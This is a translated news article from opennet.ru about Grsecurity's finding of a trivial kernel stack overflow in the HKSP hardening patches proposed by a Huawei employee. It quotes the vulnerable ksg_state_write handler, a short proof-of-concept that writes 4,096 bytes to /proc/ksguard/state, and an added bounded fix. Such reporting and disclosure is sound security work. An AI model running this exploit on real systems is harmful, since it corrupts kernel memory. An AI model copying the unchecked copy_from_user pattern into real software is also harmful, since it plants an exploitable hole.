Security problems in patches proposed by a Huawei employee to protect the Linux kernel

The developers of the Grsecurity project drew attention to a trivially exploitable vulnerability in the HKSP (Huawei Kernel Self Protection) patch set, which was proposed a few days ago to improve the security of the Linux kernel. The situation resembles the case with Samsung, where an attempt to improve system security led to the appearance of a new vulnerability and made devices easier to compromise.

The HKSP patches were published by a Huawei employee, the author's GitHub profile mentions Huawei, and the word Huawei is used in the project name (HKSP - Huawei Kernel Self Protection). At the same time, Huawei representatives denied any connection between the HKSP project and the company, stating that the code was developed on the employee's personal initiative, is not an official Huawei project and is not used in the company's products. After the vulnerability was discovered, a note was also added retroactively to the HKSP GitHub page saying that the project is developed in spare time for research purposes.

HKSP includes changes such as randomization of offsets in the cred structure, protection against attacks on the user identifier namespace (pid namespace), separation of the process stack from the mmap area, detection of double calls to the kfree function, blocking of leaks through the pseudo-FS /proc (/proc/{modules, keys, key-users}, /proc/sys/kernel/* and /proc/sys/vm/mmap_min_addr, /proc/kallsyms), improved address randomization in user space, additional Ptrace protection, strengthened smap and smep protection, the ability to prohibit sending data through raw sockets, blocking of incorrect addresses in UDP sockets, and integrity checking of running processes. It also includes the Ksguard kernel module, which is meant to detect attempts to introduce typical rootkits.

The patches attracted the interest of Greg Kroah-Hartman, who is responsible for maintaining the stable branch of the Linux kernel, and he asked the author to split the monolithic patch into parts to simplify review and promotion into the mainline kernel. Kees Cook, who heads the project for promoting active protection technology in the Linux kernel, also responded positively to the patches and, among the problems, drew attention to the binding to the x86 architecture and the notification-only nature of many modes, which merely log information about a problem but do not try to block it.

An analysis of the patch by the Grsecurity developers revealed many errors and weaknesses in the code, and also showed the absence of a threat model that would allow the project's capabilities to be judged adequately. To show clearly that the code was written without secure programming practices, they gave an example of a trivial vulnerability in the handler of the /proc/ksguard/state file, which is created with 0777 permissions, meaning that everyone has write access. The ksg_state_write function, which parses the commands written to /proc/ksguard/state, creates a tmp[32] buffer into which data is written based on the size of the operand passed in, without regard to the size of the target buffer and without checking the parameter against the size of the string. That is, to overwrite part of the kernel stack, an attacker only needs to write a specially crafted line to /proc/ksguard/state.

static ssize_t ksg_state_write(struct file *file, const char __user *buf,
                               size_t len, loff_t *offset)
{
        u64 value;
        char tmp[32];
        size_t n = 0;

        /* len is caller-controlled and is never compared with sizeof(tmp) */
        if (copy_from_user(tmp, buf, len))
                return -1;

        value = simple_strtoul(tmp, '\0', 10);
        ...

Exploit prototype:

char buf[4096] = { };
int fd = open("/proc/ksguard/state", O_WRONLY);
if (fd >= 0) {
        write(fd, buf, sizeof(buf));
        close(fd);
}
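
A bounded counterpart to the handler above, as an added example that is not part of the original article or of the HKSP code: a user-space C model that refuses any write that does not fit in tmp[32] and NUL-terminates the copy before parsing it. The function name ksg_state_write_checked is hypothetical and memcpy stands in for copy_from_user; in kernel code the same checks are available through kstrtoull_from_user(), and the proc entry would be created with a mode such as 0600 instead of 0777.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define KSG_TMP_SIZE 32 /* same size as tmp[32] in ksg_state_write */

/* User-space model of a bounded handler (hypothetical name). ubuf and len
 * stand in for the __user pointer and length; memcpy stands in for
 * copy_from_user. Returns len on success or a negative errno value. */
long ksg_state_write_checked(const char *ubuf, size_t len, uint64_t *value)
{
	char tmp[KSG_TMP_SIZE];
	char *end;
	size_t n = len;
	unsigned long long v;

	/* Reject empty writes and anything that cannot fit with its NUL. */
	if (len == 0 || len >= sizeof(tmp))
		return -EINVAL;

	memcpy(tmp, ubuf, len);
	if (tmp[n - 1] == '\n') /* newline appended by `echo 1 > file` */
		n--;
	tmp[n] = '\0'; /* the parser must never read past the copied bytes */

	if (tmp[0] < '0' || tmp[0] > '9') /* digits only: no sign, no blanks */
		return -EINVAL;

	errno = 0;
	v = strtoull(tmp, &end, 10);
	if (errno == ERANGE || end != tmp + n) /* overflow, junk, embedded NUL */
		return -EINVAL;

	*value = v;
	return (long)len;
}

int main(void)
{
	char big[4096] = { 0 }; /* constructed input: the oversized write from the article */
	uint64_t v = 0;

	printf("\"1\\n\" -> %ld\n", ksg_state_write_checked("1\n", 2, &v));
	printf("4096 bytes -> %ld\n", ksg_state_write_checked(big, sizeof(big), &v));
	return 0;
}
```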

Source: opennet.ru